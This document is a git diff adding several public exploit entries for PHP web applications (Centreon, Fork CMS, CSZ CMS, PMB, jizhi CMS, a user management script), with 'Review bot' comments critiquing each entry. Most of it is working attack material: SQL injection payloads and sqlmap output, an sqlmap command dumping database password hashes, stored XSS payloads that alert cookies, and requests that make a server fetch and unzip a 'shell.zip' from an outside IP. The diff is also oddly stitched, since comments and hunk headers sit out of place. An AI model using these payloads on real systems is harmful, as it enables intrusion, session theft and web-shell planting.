+ http://TARGET/centreon/include/monitoring/acknowlegement/xml/broker/makeXMLForAck.php?hid=15&svc_id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCONCAT%280x7176706b71%2C%28CASE%20WHEN%20%28ISNULL%28JSON_STORAGE_FREE%28NULL%29%29%29%20THEN%201%20ELSE%200%20END%29%2C0x716b716b71%29%2CNULL%2CNULL%23
+
+
+ [Payloads]
+
+ Parameter: svc_id (GET)
+ Type: boolean-based blind
+ Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
+ Payload: hid=15&svc_id=1 OR NOT 5782=5782
+
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+ Payload: hid=15&svc_id=1 AND (SELECT 1615 FROM (SELECT(SLEEP(5)))TRPy)
+
+ Type: UNION query
+ Title: MySQL UNION query (NULL) - 5 columns
+ Payload: hid=15&svc_id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x7176706b71,0x724b66756a476759544f48716d61496b5a68754a4c6f42634e6e775272724c44616e567355527a6f,0x716b716b71),NULL,NULL#
+---
+[12:24:35] [INFO] testing MySQL
+[12:24:35] [INFO] confirming MySQL
+[12:24:35] [INFO] the back-end DBMS is MySQL
+[12:24:35] [INFO] fetching banner
+web server operating system: Linux Red Hat
+web application technology: Apache 2.4.34, PHP 7.2.24
+back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
+banner: '10.1.38-MariaDB'
+[12:24:35] [INFO] fetching database names
+[12:24:35] [INFO] starting 4 threads
+[12:24:35] [INFO] resumed: 'centreon'
+[12:24:35] [INFO] resumed: 'test'
+[12:24:35] [INFO] resumed: 'centreon_storage'
+[12:24:35] [INFO] resumed: 'information_schema'
+available databases [4]:
+[*] centreon
+[*] centreon_storage
+[*] information_schema
+[*] test
\ No newline at end of file
diff --git a/exploits/php/webapps/48348.txt b/exploits/php/webapps/48348.txt
new file mode 100644
index 000000000..6a9c7ba07
--- /dev/null
+++ b/exploits/php/webapps/48348.txt
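Review bot: The executive summary in 48345.txt describes a flaw in `the tracker functionality` and `the project tracker service search functionality` whose exploitation depends on `project visibility`, none of which corresponds to the endpoint the PoC actually exercises (`include/monitoring/acknowlegement/xml/broker/makeXMLForAck.php`, parameter `svc_id`); the paragraph appears to have been carried over from an unrelated advisory and should be rewritten to describe the endpoint in the PoC path. The title names the parameter `'id'` while every payload targets `svc_id`, and whether the endpoint is reachable without a Centreon session is left at `may require user authentication`, which is the one fact a defender needs to rate exposure. No fixed version or vendor reference is given; `# Fixed in: <vendor fix version or "none known">` and a note that `svc_id` (and `hid`) must be validated as integers before being used in the query would make the entry actionable.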
@@ -0,0 +1,491 @@ +# Title: Fork CMS 5.8.0 - Persistent Cross-Site Scripting +# Author: Vulnerability Laboratory +# Date: 2020-04-15 +# Vendor: https://www.fork-cms.com/download +# Software Link: https://github.com/forkcms/forkcms/pull/3073 +# CVE: N/A + +Document Title: +=============== +Fork CMS v5.8.0 - Multiple Persistent Web Vulnerbilities + + +References (Source): +==================== +https://www.vulnerability-lab.com/get_content.php?id=2208 + +ID (3073): https://github.com/forkcms/forkcms/pull/3073 + + +Release Date: +============= +2020-04-17 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +2208 + + +Common Vulnerability Scoring System: +==================================== +5.3 + + +Vulnerability Class: +==================== +Cross Site Scripting - Persistent + + +Current Estimated Price: +======================== +1.000€ - 2.000€ + + +Product & Service Introduction: +=============================== +Fork is an easy to use open source CMS using Symfony Components. Fork +CMS is dedicated to creating a user friendly environment +to build, monitor and +update your website. We take great pride in being the Content Management +System of choice for beginners and professionals. + +(Copy of the Homepage: https://www.fork-cms.com & +https://www.fork-cms.com/download ) + + +Abstract Advisory Information: +============================== +The vulnerability laboratory core research team discovered multiple +persistent web vulnerabilities in the official Fork CMS v5.8.0. 
+ + +Affected Product(s): +==================== +ForkCMS +Product: Fork CMS v5.8.0 - Content Management System (Web-Application) + + +Vulnerability Disclosure Timeline: +================================== +2020-04-17: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +Medium + + +Authentication Type: +==================== +Restricted authentication (user/moderator) - User privileges + + +User Interaction: +================= +Low User Interaction + + +Disclosure Type: +================ +Independent Security Research + + +Technical Details & Description: +================================ +Multiple persistent input validation web vulnerabilities has been +discovered in the official Fork CMS v5.8.0 open-source web-application. +The vulnerability allows remote attackers to inject own malicious script +codes with persistent attack vector to compromise browser to +web-application requests from the application-side. + +The persistent input validation web vulnerabilities are located in the +`Displayname` input field when using the `Add`, `Edit` or `Register` +mechanism that forwards the information into the `var` parameter. Remote +attackers and privileged application user accounts are able to +inject own malicious persistent script code as the users displayname by +usage of the registration module (/profiles/register). Privileged +users with access to the profile or users module are able to exploit the +issue by a simple inject. The displayname then becomes visible in +the Admin - Profiles Index on Preview, Edit User/Profile, Delete User +Interaction and User Index in Listing modules. the var parameter +does not encode or parse the exisiting injected content and executes it. +The request method to inject is POST and the attack vector of the +vulnerability is located on the application-side of the content +management system. 
The injection point is located in the registration form +and the add/edit user function. The execution point of the issue occurs +in the preview profile, edit user, user index listing and delete +user message context. + +Successful exploitation of the vulnerabilities results in session +hijacking, persistent phishing attacks, persistent external redirects to +malicious source and persistent manipulation of affected application +modules. + +Request Method(s): +[+] POST + +Vulnerable Module(s): +[+] Register +[+] Add User +[+] Edit User + +Vulnerable Input(s): +[+] Displayname + +Vulnerable Parameter(s): +[+] var + +Affected Module(s): +[+] Preview Profile +[+] Edit User +[+] User Index +[+] Delete User + + +Proof of Concept (PoC): +======================= +The persistent input validation web vulnerabilities can be exploited by +remote attackers with low privileged user account and low user interaction. +For security demonstration or to reproduce the security vulnerability +follow the provided information an steüs below to continue. + + +Manual steps to reproduce the vulnerability ... +1. Open the fork cms web-application newst version +2. Move via sitemap or by link to the registration page +(/modules/profiles/register) +3. Inject your script code payload html/js to the Displayname input field +4. Register the account by pushing submit +5. Activate the link in the account registration email +Note: Now simple wait until the administrator / privileged user visits +the panel to execute the code on interaction or preview only +6. Successful reproduce of the persistent script code injection +vulnerability! 
+ + +PoC: Vulnerable Source (User Index in Listing - +https://fork-cms.localhost:8080/private/en/users/index) +<tr id="row-2" class="even"> +<td class="nickname"><a +href="/private/en/users/edit?token=k7byefqor8&id=2" +title="edit">test3"><iframe src="evil.source" +onload=alert(document.cookie)></a></td> +<td class="fork-data-grid-action actionEdit"><a +href="/private/en/users/edit?token=k7byefqor8&id=2" +class="btn btn-default btn-xs pull-right"> +<span class="fa fa-pencil" aria-hidden="true"></span> Edit</a></td> +</tr> + + +PoC: Vulnerable Source (Profiles Index on Preview - +https://fork-cms.localhost:8080/private/en/profiles/index) +<tbody><tr id="row-1" class="odd"> +<td class="check"><input type="checkbox" name="id[]" value="1" +class="inputCheckbox checkBeforeUnload"></td> +<td class="email"><a +href="/private/en/profiles/edit?token=k7byefqor8&id=1" +title="">tester23@protonmail.com</a></td> +<td class="display_name">"<iframe src="evil.source" +onload="alert(document.cookie)"></td> +<td class="registered_on">13 April 2020 11:17</td> +<td class="fork-data-grid-action actionEdit"> +<a href="/private/en/profiles/edit?token=k7byefqor8&id=1" class="btn +btn-default btn-xs pull-right"> +<span class="fa fa-pencil" aria-hidden="true"></span> Edit</a></td> +</tr></tbody> + + +PoC: Vulnerable Source (Delete User - On Interaction) +<form name="delete" method="post" +action="/private/en/users/delete?token=k7byefqor8"> +<input type="hidden" id="delete__token" name="delete[_token]" +value="q3ADogMObka_-73n5afnMPsJHj9ZAI_ch5uiabqDsqs" /> +<input type="hidden" id="delete_id" name="delete[id]" value="2" /> +<div class="modal fade" id="confirmDelete" role="dialog" tabindex="-1" +aria-hidden="true" aria-labelledby="confirmDeleteTitle"> +<div class="modal-dialog"><div class="modal-content"><div +class="modal-header"> +<h4 class="modal-title" id="confirmDeleteTitle">Delete</h4></div> +<div class="modal-body"> +<p>Are your sure you want to delete the user "evil.source"><iframe 
+src=evil.source onload=alert(document.cookie)>"?</p></div> +<div class="modal-footer"> +<button class="btn btn-default" title="Cancel" data-dismiss="modal"> +<span class="fa fa-times" aria-hidden="true"></span> +<span class="btn-text">Cancel</span></button> +<button class="btn btn-danger" title="Delete" > +<span class="fa fa-trash" aria-hidden="true"></span> +<span class="btn-text">Delete</span> +</button></div></div></div></div> +</form> + + +--- PoC Session Logs [POST] (Registration User Account) --- +https://fork-cms.localhost:8080/en/modules/profiles/register#registerForm +Host: fork-cms.localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +Referer: https://fork-cms.localhost:8080/en/modules/profiles/register +Content-Type: application/x-www-form-urlencoded +Content-Length: 179 +Origin: https://fork-cms.localhost:8080 +Connection: keep-alive +Cookie: +track=s%3A32%3A%229739044e17a322bae65870698df9b79e%22%3B;PHPSESSID=dc1ffd3d01b2200d81b05cacb58e758d; + +interface_language=en; frontend_language=en; cookie_bar_agree=Y; +cookie_bar_hide=Y; +form=register&form_token=f1e7f2e9077b0400f5e97591ac09ef3e&display_name=>"<iframe +src=evil.source +onload=alert(document.cookie)>&email=tester23@protonmail.com&password=pwnd +- +POST: HTTP/1.1 302 Found +Server: nginx/1.6.2 +Content-Type: text/html; charset=UTF-8 +Transfer-Encoding: chunked +Connection: keep-alive +Cache-Control: max-age=0, must-revalidate, private +Set-Cookie: frontend_language=en; expires=Wed, 13-May-2020 09:49:57 GMT; +Max-Age=2592000; +path=/; domain=.fork-cms.localhost:8080; httponly; samesite=lax +track=s%3A32%3A%229739044e17a322bae65870698df9b79e%22%3B; expires=Tue, +13-Apr-2021 09:49:57 GMT; +Max-Age=31536000; path=/; domain=.fork-cms.localhost:8080; httponly; +samesite=lax +Location: 
https://fork-cms.localhost:8080 +X-server: fork01 + + +-- PoC Session Logs [POST] (Add User) --- +https://fork-cms.localhost:8080/private/en/users/add?token=k7byefqor8 +Host: fork-cms.localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +Referer: +https://fork-cms.localhost:8080/private/en/users/add?token=k7byefqor8 +Content-Type: multipart/form-data; +boundary=---------------------------56051791419552543783889366402 +Content-Length: 2545 +Origin: https://fork-cms.localhost:8080 +Connection: keep-alive +Cookie: PHPSESSID=dc1ffd3d01b2200d81b05cacb58e758d; interface_language=en +Upgrade-Insecure-Requests: 1 +form=add&form_token=f1e7f2e9077b0400f5e97591ac09ef3e&email=tester232323@protonmail.com&password=tester445 +&confirm_password=tester445&name=test1&surname=test2&nickname=test3>"<iframe +src=a onload=alert(document.cookie)>&avatar= +&interface_language=en&preferred_editor=ck-editor&date_format=j F +Y&time_format=H:i&number_format=dot_nothing +&csv_split_character=;&csv_line_ending=n&active=1&groups[]=1&add= +- +POST: HTTP/1.1 302 Found +Server: nginx/1.6.2 +Content-Type: text/html; charset=UTF-8 +Transfer-Encoding: chunked +Connection: keep-alive +Cache-Control: max-age=0, must-revalidate, private +Set-Cookie: interface_language=en; expires=Wed, 13-May-2020 08:44:47 +GMT; Max-Age=2592000; path=/; domain=.fork-cms.localhost:8080; httponly; +samesite=lax +Location: +/private/en/users/index?token=k7byefqor8&report=added&var=test3>"<iframe +src=evil.source onload=alert(document.cookie)>&highlight=row-4 +X-server: fork01 +- +https://fork-cms.localhost:8080/private/en/users/index?token=k7byefqor8&report=added&var=test3>"<iframe +src=evil.source onload=alert(document.cookie)>&highlight=row-4 +Host: fork-cms.localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; 
Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +Referer: +https://fork-cms.localhost:8080/private/en/users/add?token=k7byefqor8 +Connection: keep-alive +Cookie: PHPSESSID=dc1ffd3d01b2200d81b05cacb58e758d; interface_language=en +- +POST: HTTP/1.1 200 OK +Server: nginx/1.6.2 +Content-Type: text/html; charset=UTF-8 +Content-Length: 3615 +Connection: keep-alive +Cache-Control: max-age=0, must-revalidate, private +Set-Cookie: interface_language=en; expires=Wed, 13-May-2020 08:44:47 +GMT; Max-Age=2592000; path=/; domain=.fork-cms.localhost:8080; httponly; +samesite=lax +Vary: Accept-Encoding +Content-Encoding: gzip +X-server: fork01 +- +GET: HTTP/1.1 200 OK +Server: nginx/1.6.2 +https://fork-cms.localhost:8080/private/en/users/evil.source +Host: fork-cms.localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Content-Type: text/html; charset=UTF-8 +Transfer-Encoding: chunked +Connection: keep-alive +Cache-Control: max-age=0, must-revalidate, private +Set-Cookie: interface_language=en; expires=Wed, 13-May-2020 08:44:47 +GMT; Max-Age=2592000; path=/; domain=.fork-cms.localhost:8080; httponly; +samesite=lax +Location: /private/en/error?type=action-not-allowed +X-server: fork01 + + +-- PoC Session Logs [POST] (Edit User) --- +https://fork-cms.localhost:8080/private/en/users/edit?token=k7byefqor8&id=2 +Host: fork-cms.localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +Referer: +https://fork-cms.localhost:8080/private/en/users/edit?token=k7byefqor8&id=2 +Content-Type: 
multipart/form-data; +boundary=---------------------------388544425912514902093103180709 +Content-Length: 2563 +Origin: https://fork-cms.localhost:8080 +Connection: keep-alive +Cookie: PHPSESSID=dc1ffd3d01b2200d81b05cacb58e758d; interface_language=en +form=edit&form_token=f1e7f2e9077b0400f5e97591ac09ef3e&email=testemail337@protonmail.com&name=test1&surname=test2 +&nickname=test3>"<iframe src=evil.source +onload=alert(document.cookie)>&avatar=&new_password=&confirm_password= +&interface_language=en&preferred_editor=ck-editor&date_format=j F +Y&time_format=H:i&number_format=dot_nothing& +csv_split_character=;&csv_line_ending=n&active=1&groups[]=1&edit= +- +POST: HTTP/1.1 302 Found +Server: nginx/1.6.2 +Content-Type: text/html; charset=UTF-8 +Transfer-Encoding: chunked +Connection: keep-alive +Cache-Control: max-age=0, must-revalidate, private +Set-Cookie: interface_language=en; expires=Wed, 13-May-2020 08:34:55 +GMT; Max-Age=2592000; path=/; domain=.fork-cms.localhost:8080; httponly; +samesite=lax +Location: +/private/en/users/index?token=k7byefqor8&report=edited&var=test3>"<iframe src=evil.source +onload=alert(document.cookie)>&highlight=row-2 +X-server: fork01 +https://fork-cms.localhost:8080/private/en/users/index?token=k7byefqor8&report=edited&var=test3>"<iframe +src=evil.source onload=alert(document.cookie)>&highlight=row-2 +Host: fork-cms.localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +Referer: +https://fork-cms.localhost:8080/private/en/users/edit?token=k7byefqor8&id=2 +Connection: keep-alive +Cookie: PHPSESSID=dc1ffd3d01b2200d81b05cacb58e758d; interface_language=en +- +POST: HTTP/1.1 200 OK +Server: nginx/1.6.2 +Content-Type: text/html; charset=UTF-8 +Content-Length: 3585 +Connection: keep-alive +Cache-Control: max-age=0, must-revalidate, private 
+Set-Cookie: interface_language=en; expires=Wed, 13-May-2020 08:34:55 GMT; +Max-Age=2592000; path=/; domain=.fork-cms.localhost:8080; httponly; +samesite=lax +Vary: Accept-Encoding +Content-Encoding: gzip +X-server: fork01 + + +Reference(s): +https://fork-cms.localhost:8080/en/modules/profiles/register +https://fork-cms.localhost:8080/private/en/profiles/index +https://fork-cms.localhost:8080/private/en/users/index +https://fork-cms.localhost:8080/private/en/users/edit +https://fork-cms.localhost:8080/private/en/users/add + + +Security Risk: +============== +The security risk of the persistent input validation web vulnerabilities +in the fork cms web-application is estimated as high. + + +Credits & Authors: +================== +Vulnerability-Lab - +https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab +Benjamin Kunz Mejri - +https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without +any warranty. Vulnerability Lab disclaims all warranties, +either expressed or implied, including the warranties of merchantability +and capability for a particular purpose. Vulnerability-Lab +or its suppliers are not liable in any case of damage, including direct, +indirect, incidental, consequential loss of business profits +or special damages, even if Vulnerability-Lab or its suppliers have been +advised of the possibility of such damages. Some states do +not allow the exclusion or limitation of liability for consequential or +incidental damages so the foregoing limitation may not apply. +We do not approve or encourage anybody to break any licenses, policies, +deface websites, hack into databases or trade with stolen data. 
+ +Domains: www.vulnerability-lab.com www.vuln-lab.com +www.vulnerability-db.com +Services: magazine.vulnerability-lab.com +paste.vulnerability-db.com infosec.vulnerability-db.com +Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab +youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php +vulnerability-lab.com/rss/rss_upcoming.php +vulnerability-lab.com/rss/rss_news.php +Programs: vulnerability-lab.com/submit.php +vulnerability-lab.com/register.php +vulnerability-lab.com/list-of-bug-bounty-programs.php + +Any modified copy or reproduction, including partially usages, of this +file requires authorization from Vulnerability Laboratory. +Permission to electronically redistribute this alert in its unmodified +form is granted. All other rights, including the use of other +media, are reserved by Vulnerability-Lab Research Team or its suppliers. +All pictures, texts, advisories, source code, videos and other +information on this website is trademark of vulnerability-lab team & the +specific authors or managers. To record, list, modify, use or +edit our material contact (admin@ or research@) to get a ask permission. + + Copyright © 2020 | Vulnerability Laboratory - [Evolution +Security GmbH]™ + + + + +-- +VULNERABILITY LABORATORY - RESEARCH TEAM \ No newline at end of file diff --git a/exploits/php/webapps/48354.txt b/exploits/php/webapps/48354.txt new file mode 100644 index 000000000..c97757266 --- /dev/null +++ b/exploits/php/webapps/48354.txt 
@@ -0,0 +1,32 @@
+# Exploit Title: CSZ CMS 1.2.7 - Persistent Cross-Site Scripting
+# Exploit Author: Metin Yunus Kandemir
+# Vendor Homepage: https://www.cszcms.com/
+# Software Link: https://sourceforge.net/projects/cszcms/
+# Version: v1.2.7
+# Description:
+# Unauthorized user that has access private message can embed Javascript
+# code to admin panel.
+
+# Steps to reproduce:
+1- Log in to member panel.
+1- Change user-agent header as <script>alert(1)</script>
+2- Send the private message to admin user.
+3- When admin user logs in to Backend System Dashboard, an alert box pops
+up on screen.
+
+PoC Request:
+
+POST /CSZCMS-V1.2.7/member/insertpm/ HTTP/1.1
+Host: localhost
+User-Agent: <script>alert(1)</script>
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/CSZCMS-V1.2.7/member/newpm
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 152
+Cookie: cszcookie
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+csrf_csz=*&csrf_csz=*&to%5B%5D=1&title=user-agent&message=user-agent&submit=Send
\ No newline at end of file
diff --git a/exploits/php/webapps/48356.txt b/exploits/php/webapps/48356.txt
new file mode 100644
index 000000000..fce82ae1b
--- /dev/null
+++ b/exploits/php/webapps/48356.txt
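Review bot: The description calls the attacker an "Unauthorized user" while step 1 requires logging in to the member panel; the sink needs a member account with private-message access, so the line should read `# An authenticated member with private-message access can embed JavaScript` and the steps should be numbered 1–4 instead of 1, 1, 2, 3. The text should also spell out that the vector is the `User-Agent` request header stored with the message and later rendered on the Backend System Dashboard, not the `title`/`message` fields, so filtering the form inputs would not stop it and the fix belongs at the output encoding of the dashboard. The `csrf_csz=*&csrf_csz=*` body carries a placeholder token twice; a note that the live token from `/member/newpm` must be substituted (and Content-Length adjusted) would save readers a failed reproduction.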
@@ -0,0 +1,43 @@
+# Exploit Title: PMB 5.6 - 'logid' SQL Injection
+# Google Dork: inurl:opac_css
+# Date: 2020-04-20
+# Exploit Author: 41-trk (Tarik Bakir)
+# Vendor Homepage: http://www.sigb.net
+# Software Link: http://forge.sigb.net/redmine/projects/pmb/files
+# Affected versions : <= 5.6
+
+-==== Software Description ====-
+
+PMB is a completely free ILS (Integrated Library management System). The domain of software for libraries is almost exclusively occupied by proprietary products.
+We are some librarians, users and developers deploring this state of affairs.
+
+PMB is based on web technology. This is what we sometimes call a 'web-app'.
+PMB requires an HTTP server (such as Apache, but this is not an obligation), the MySQL database and the PHP language.
+
+The main functions of PMB are :
+
+ * Supporting the UNIMARC format
+ * Authorities management (authors, publishers, series, subjects...)
+ * Management of loans, holds, borrowers...
+ * A user-friendly configuration
+ * The ability to import full bibliographic records
+ * A user-friendly OPAC integrating a browser
+ * Loans management with a module designed to serve even the very small establishments
+ * Serials management
+ * Simple administration procedures that can be handled easily even by the library staff...
+
+-==== Vulnerability ====-
+
+Variable $logid isn't properly sanitized in file /admin/sauvegarde/download.php, which allows ADMINISTRATION_AUTH to execute arbitrary SQL commands via the id parameter.
+
+-==== POC ====-
+
+http://localhost/[PMB_PATH]/admin/sauvegarde/download.php?logid=1 [SQLI]
+
+Using SQLMAP :
+
+./sqlmap.py -u "http://localhost/[PMB_PATH]/admin/sauvegarde/download.php?logid=1" -p logid --headers="Cookie: [VALID_USER_COOKIE]" --passwords
+
+-==== Exploit requirements ====-
+
+- You will need to be logged in in order to exploit the vulnerability.
\ No newline at end of file
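Review bot: The vulnerability paragraph names the injected parameter as "the id parameter" while the PoC URL and the sqlmap `-p logid` switch target `logid`; the sentence should end `... to execute arbitrary SQL commands via the logid parameter.` The `ADMINISTRATION_AUTH` token is the only hint that this is a post-authentication issue needing administration-level rights, so the requirements section should state which privilege level is required rather than just "logged in". `--passwords` in the sqlmap line dumps DBMS user hashes and typically needs elevated MySQL privileges on the application's database account, so a reader should expect it to fail on a least-privilege deployment; `--dbs` or `--current-user` would be a safer first confirmation. `--cookie="..."` is the conventional way to pass the session to sqlmap, although `--headers` works as written.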
diff --git a/exploits/php/webapps/48357.txt b/exploits/php/webapps/48357.txt
new file mode 100644
index 000000000..1b33d4bfa
--- /dev/null
+++ b/exploits/php/webapps/48357.txt
@@ -0,0 +1,27 @@
+# Exploit Title: CSZ CMS 1.2.7 - 'title' HTML Injection
+# Exploit Author: Metin Yunus Kandemir
+# Vendor Homepage: https://www.cszcms.com/
+# Software Link: https://sourceforge.net/projects/cszcms/
+# Version: v1.2.7
+# Description:
+# Authenticated user can inject hyperlink to Backend System Dashboard and
+# Member Dashboard via message.
+
+PoC Request:
+
+POST /CSZCMS-V1.2.7/member/insertpm/ HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101
+Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/CSZCMS-V1.2.7/member/newpm
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 196
+Cookie: cszcookie
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+csrf_csz=*&csrf_csz=*&to%5B%5D=1&title=<h1><b><a href="http://changeme/">Please
+click to view</a></b></h1>&message=phishing&submit=Send
\ No newline at end of file
diff --git a/exploits/php/webapps/48361.txt b/exploits/php/webapps/48361.txt
new file mode 100644
index 000000000..111f38335
--- /dev/null
+++ b/exploits/php/webapps/48361.txt
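Review bot: The title says "HTML Injection" and the description only claims a hyperlink, but nothing in the PoC shows that the `title` field is limited to benign tags; since `<h1><b><a>` are rendered unescaped on both dashboards, a `<script>` tag or an event handler would presumably pass as well, and the text should either demonstrate that or name the filter that stops it. The request is the same `/member/insertpm/` endpoint and the same duplicated `csrf_csz=*` placeholder as the User-Agent PoC in 48354, so a line such as `# Same endpoint as EDB-48354; replace csrf_csz with the live token from /member/newpm` would tie the two together and avoid a failed reproduction. The `User-Agent:` header is wrapped across two lines (`Gecko/20100101` / `Firefox/60.0`), which most servers reject as an obsolete line fold if pasted verbatim; it should be rejoined on one line.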
@@ -0,0 +1,46 @@
+# Exploit Title: jizhi CMS 1.6.7 - Arbitrary File Download
+# Google Dork: jizhicms
+# Date: 2020-04-18
+# Exploit Author: iej1ctk1g
+# Vendor Homepage: https://www.jizhicms.cn/
+# Software Link: http://down.jizhicms.cn/jizhicms_Beta1.6.7.zip
+# Version: 1.6.7
+# Tested on: Mac OS
+# CVE : N/A
+
+Data 1.
+
+POST /admin.php/Plugins/update.html HTTP/1.1
+Host: 192.168.1.253:8888
+Content-Length: 86
+Accept: application/json, text/javascript, */*; q=0.01
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Origin: http://192.168.1.253:8888
+Referer: http://192.168.1.253:8888/admin.php/Plugins/index.html
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
+Cookie: PHPSESSID=32db2410f5d69bf21ba9b21ab8093a09
+Connection: close
+
+action=start-download&filepath=shell&download_url=http://39.105.143.130:9090/shell.zip
+
+
+Data 2.
+
+POST /admin.php/Plugins/update.html HTTP/1.1
+Host: 192.168.1.253:8888
+Content-Length: 32
+Accept: application/json, text/javascript, */*; q=0.01
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Origin: http://192.168.1.253:8888
+Referer: http://192.168.1.253:8888/admin.php/Plugins/index.html
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
+Cookie: PHPSESSID=32db2410f5d69bf21ba9b21ab8093a09
+Connection: close
+
+action=file-upzip&filepath=shell
\ No newline at end of file
diff --git a/exploits/php/webapps/48368.txt b/exploits/php/webapps/48368.txt
new file mode 100644
index 000000000..457a98a70
--- /dev/null
+++ b/exploits/php/webapps/48368.txt
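Review bot: There is no description, so a reader cannot tell what the two requests achieve: request 1 (`action=start-download` with an attacker-controlled `download_url`) makes the server fetch a remote archive into `filepath=shell`, and request 2 (`action=file-upzip`) extracts it, which looks like an authenticated plugin-update abuse that writes arbitrary files onto the server (a web shell, judging by the names) rather than a "file download"; a short `# Description:` giving the preconditions (an admin session on the `admin.php` route), what `filepath` resolves to and where the archive is extracted would make the title match the impact. The PoC embeds a third-party public address, `39.105.143.130:9090`, as the payload host; it should be a placeholder such as `http://ATTACKER_HOST/shell.zip` so nobody pulls an unknown archive onto a test box, and the live `PHPSESSID` should likewise become `<admin session>`. Since both requests hit an admin-only controller, the title line should say `Authenticated (admin)`.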
@@ -0,0 +1,50 @@
+# Exploit Title: User Management System 2.0 - Persistent Cross-Site Scripting
+# Author: Besim ALTINOK
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/
+# Version: v2.0
+# Tested on: Xampp
+# Credit: İsmail BOZKURT
+
+------ Details:
+
+1- Vulnerable code is here:
+
+Insert user registration information to the DB without filtering.
+
+if(isset($_POST['signup']))
+{
+$fname=$_POST['fname'];
+$lname=$_POST['lname'];
+$email=$_POST['email'];
+$password=$_POST['password'];
+$contact=$_POST['contact'];
+$enc_password=$password;
+$msg=mysqli_query($con,"insert into
+users(fname,lname,email,password,contactno)
+values('$fname','$lname','$email','$enc_password','$contact')");
+if($msg)
+{
+echo "<script>alert('Register successfully');</script>";
+}
+}
+
+2- In the admin dashboard:
+
+Get fullName from DB and print it without any filtering
+
+<?php $ret=mysqli_query($con,"select * from users");
+$cnt=1;
+while($row=mysqli_fetch_array($ret))
+{?>
+<tr>
+<td><?php echo $cnt;?></td>
+<td><?php echo $row['fname'];?></td>
+<td><?php echo $row['lname'];?></td>
+<td><?php echo $row['email'];?></td>
+<td><?php echo $row['contactno'];?></td> <td><?php echo
+$row['posting_date'];?></td>
+</tr>
+
+4- If we insert value of the "fname" as "script>prompt(1)</script>", we can
+perform this attack as "Stored XSS"
\ No newline at end of file
diff --git a/exploits/php/webapps/48369.txt b/exploits/php/webapps/48369.txt
new file mode 100644
index 000000000..5fe1b5d54
--- /dev/null
+++ b/exploits/php/webapps/48369.txt
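Review bot: The payload in the last step, `"script>prompt(1)</script>"`, is missing the opening `<` and would be rendered as literal text; it should read `"<script>prompt(1)</script>"`. The step numbering jumps from 2 to 4, so either a step 3 was dropped or the last step should be renumbered 3. The quoted registration code also shows `$enc_password=$password;` with every field concatenated straight into the `insert into users(...)` statement, so the same input is SQL-injectable and the password is stored in clear text; one sentence saying so here would help readers who arrive via the XSS title. The sink is `echo $row['fname']` (and the sibling `lname`/`email`/`contactno` cells), so the fix is `htmlspecialchars()` at that echo rather than filtering on the registration form.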
@@ -0,0 +1,49 @@
